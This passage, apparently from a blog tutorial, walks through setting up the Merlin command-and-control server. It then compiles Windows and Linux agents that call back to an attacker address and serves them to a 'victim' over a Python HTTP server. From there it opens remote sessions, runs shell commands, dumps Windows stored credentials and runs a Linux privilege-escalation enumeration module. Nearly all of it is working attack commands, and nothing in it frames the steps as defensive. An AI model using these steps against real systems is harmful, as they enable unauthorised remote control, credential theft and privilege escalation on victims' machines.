wget https://github.com/Ne0nd0g/merlin/releases/download/v0.1.4/merlinServer-Linux-x64-v0.1.4.7z
```
![[Image: 1.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-OlBodaw85iQ/XIdvehF4LmI/AAAAAAAAdbo/kSUaiHq1_305b_nanGAnPKZhn9iOogQlgCLcBGAs/s1600/1.png?w=687)
Once the above commands have executed successfully, use the following command to unpack the Merlin server:
```bash
7z x merlinServer-Linux-x64-v0.1.4.7z
```
![[Image: 2.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-cGWOrVZhfCU/XIdvggDU6nI/AAAAAAAAdcI/8_1mCvlkgE823tdvdLHSPs3JKZBu9le6ACLcBGAs/s1600/2.png?w=687)
After unpacking, the ls command shows the Merlin server binary and a readme file. Check that the server runs with the following command:
```bash
./merlinServer-Linux-x64
```
![[Image: 3.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-hKNC9fERFFI/XIdvipF70-I/AAAAAAAAdco/alOHzwUAbZkjNyoQvzMg_j5sqSVoEBuZACLcBGAs/s1600/3.png?w=687)
In “README.MD”, we find the instructions for installing “Merlin” in our system.
![[Image: 4.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-x0vnvQYfilU/XIdw5Y4gY9I/AAAAAAAAdeg/YyojHeoMOkgKrf2TE41HGqXov532hfowwCLcBGAs/s1600/4.png?w=687)
According to the readme, we have to set up the GOPATH environment variable and then install Merlin using go get instead of git clone. To complete these steps, run the following commands:
```bash
# Append to the home directory's .bashrc so GOPATH persists across shells
echo "export GOPATH=$HOME/go" >> ~/.bashrc
source ~/.bashrc
go get github.com/Ne0nd0g/merlin
```
Once the directory is downloaded, let’s check its contents using cd and ls commands.
![[Image: 5.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-4AQLmCupt5s/XIdw5bARGII/AAAAAAAAdek/gUU0voFqs901z6are9mrKCUyzOVSFwQhQCLcBGAs/s1600/5.png?w=687)
There is a cmd directory, and inside it a directory named merlinserver containing main.go. Run main.go as shown in the image below:
```bash
go run main.go
```
![[Image: 6.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-ZuAVTqpA_UQ/XIdw59VAKlI/AAAAAAAAdeo/5qGGEwz-EsEHyVB6nWEQXUYIlwWaJB15wCLcBGAs/s1600/6.png?w=687)
As you can see, Merlin is still not running properly because it has no SSL certificate. If you look in the /opt/merlin directory, you will find a directory named data that contains an SSL certificate. Copy the data folder into the merlinserver directory as shown in the image below:
![[Image: 7.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-6nFk4qvFjew/XIdw50vWsQI/AAAAAAAAdes/zcYzdyxiRqYzVZBPC5v5lm1REmr30g3QwCLcBGAs/s1600/7.png?w=687)
Now if you run merlin using the command: go run main.go, merlin server will run successfully.
![[Image: 8.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-Vfh4YaQTIFM/XIdw6E-pHtI/AAAAAAAAdew/9jqXvFK3AucCyyS1vF73bwJlVwEEaVaHgCLcBGAs/s1600/8.png?w=687)
The following help command shows, as in the image, the arguments you can use to run the server as desired:
```bash
go run main.go -h
```
![[Image: 9.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-j5TYsnldQ6o/XIdw67HrYQI/AAAAAAAAde0/ATmEJa-jn6IrMzWWaa8DKfvD3BFcgD2rgCLcBGAs/s1600/9.png?w=687)
Windows exploitation
Now, to build the Merlin agent for Windows, type the following command:
```bash
GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://192.168.0.11:443" -o shell.exe main.go
```
Now, share the agent with the target using the Python HTTP server:
```bash
python -m SimpleHTTPServer 80
```
![[Image: 10.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-CYOfMgPcJ0A/XIdwyHuhkSI/AAAAAAAAddY/g_rTf3RO68ghU43_vaiV09ZZyXe1TliqQCLcBGAs/s1600/10.png?w=687)
To create a listener for the agent to call back to, use the following command:
```bash
go run main.go -i 192.168.0.11
```
![[Image: 12.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-nhufYWFhnoI/XIdwyJw-AGI/AAAAAAAAddc/TGeUG7TdQks21of99ehorb-sOSMwrxhxACLcBGAs/s1600/12.png?w=687)
And just like that, you will have your session as shown in the image above. Now, use the help command to see all the options as shown in the image given below:
![[Image: 13.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-So55jRusNqk/XIdwyzI-1jI/AAAAAAAAddg/46FNLODYyKwz02T6w469efZngs6TEA7MACLcBGAs/s1600/13.png?w=687)
Type sessions to see the list of the sessions you acquire as shown in the image below:
![[Image: 14.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-7alRGs1oT_g/XIdwzCIzkVI/AAAAAAAAddo/MD9f-j29H4kGIMrRORgCmMXB-D2fIiznQCLcBGAs/s1600/14.png?w=687)
To access an available session, use the following command:
```
interact <session name>
```
![[Image: 15.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-Dk1ZYsifN2E/XIdwzMTZDoI/AAAAAAAAddk/hnkeu9b1kdgyv-zNBP99snV1XQQUfjWlQCLcBGAs/s1600/15.png?w=687)
Once you have accessed the session, you can use Windows commands such as:
```
shell ipconfig
```
![[Image: 16.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-6rSaiYggKYw/XIdwzp0c2QI/AAAAAAAAdds/AdH6RAF2BWgtXT3c_enJ6rX_x0l8cxb0wCLcBGAs/s1600/16.png?w=687)
You can then use various post-exploitation modules, a list of which is shown in the image below:
![[Image: 17.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-1mLNUe85h-8/XIdw0CRxaLI/AAAAAAAAddw/tdLC2kSOLs4c4GfKvyeIgYOgHhsyG3jvACLcBGAs/s1600/17.png?w=687)
Windows post exploitation
We will use a module here to dump Windows credentials; to activate this post-exploitation module, type:
```
use module windows/x64/powershell/credentials/dumpCredStore
```
![[Image: 18.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-7C6ZkII0iU0/XIdw0oFDh3I/AAAAAAAAdd0/q6IT59NWWP0IycnyiWHFzVr129CDFaGXwCLcBGAs/s1600/18.png?w=687)
As you can see in the image above, the info command gives us all the details about the module, including the options that we need to specify. So, let's set the options:
```
set agent <agent name>
run
```
![[Image: 19.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-GsNqEVtYcHs/XIdw1DleFzI/AAAAAAAAdd4/WHTAaw3pHnkMtLTZ1FA_qeVsaPVrbqCoACLcBGAs/s1600/19.png?w=687)
Linux exploitation
Now, we will build a Merlin agent for a Linux machine. For this, simply type the following command:
```bash
export GOOS=linux; export GOARCH=amd64; go build -ldflags "-s -w -X main.url=https://192.168.0.11:443" -o shell.elf main.go
```
Once the command has executed, your malware is created. Use Python to share the file with the victim as shown in the image below, or however you see fit. To start the Python HTTP server:
```bash
python -m SimpleHTTPServer 80
```
![[Image: 20.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-VGAr3dnPm0o/XIdw1xpFLyI/AAAAAAAAdeA/ID1E9QcnCtca1Pk8J3hLaYix-z_UVsKBQCLcBGAs/s1600/20.png?w=687)
Set up the listener and wait for the file to be executed:
```bash
go run main.go -i 192.168.0.11
```
![[Image: 22.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-Ooxrg5H6X8I/XIdw1ysnAtI/AAAAAAAAdeE/jX68Auv0k98gIqp7rHsjmvBOV8_tzKL5ACLcBGAs/s1600/22.png?w=687)
And as shown in the image above, you will have your session. Then type sessions to see the list of sessions gained.
![[Image: 23.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-lRp5wx27rcU/XIdw2kg01LI/AAAAAAAAdeI/QQrmwDojVbU44Vke9RpxiF4nTNiNzMRqgCLcBGAs/s1600/23.png?w=687)
Then, to access the session, use the following command:
```
interact <session name>
```
![[Image: 24.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-YZoVuOf2gy4/XIdw3ER35cI/AAAAAAAAdeM/Rk_uXLCqVzAvG1qqzQBqB5g7tV0PpK4agCLcBGAs/s1600/24.png?w=687)
You can then use any Linux command, such as:
```
shell ls
```
![[Image: 25.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-y22di9bTdog/XIdw3i1OdoI/AAAAAAAAdeQ/b28VL0MZcjIOzpWE619KEoxePBLhP-fIACLcBGAs/s1600/25.png?w=687)
Linux post exploitation
On Linux too, you can use a number of post-exploitation modules. The one we will use in this article is privesc/LinEnum:
```
use module linux/x64/bash/privesc/LinEnum
```
![[Image: 26.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-0Qd2HAOJvfE/XIdw4P6DmGI/AAAAAAAAdeU/wz9Hc9_7NEcCqTU6lak3AIBwmIMqc9fbACLcBGAs/s1600/26.png?w=687)
Through the info command, we know that we have to give a session in order to run this module. So, type:
```
set agent <session name>
run
```
![[Image: 27.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-vOYBM0XwBi8/XIdw4yR9B7I/AAAAAAAAdeY/izTmymjG6YEXgUJvYqd12-NjF4ZSBUF2wCLcBGAs/s1600/27.png?w=687)
And this way your module will run. Try working with the Merlin C2 tool; it is one of the best, and as you can see it is conveniently cross-platform.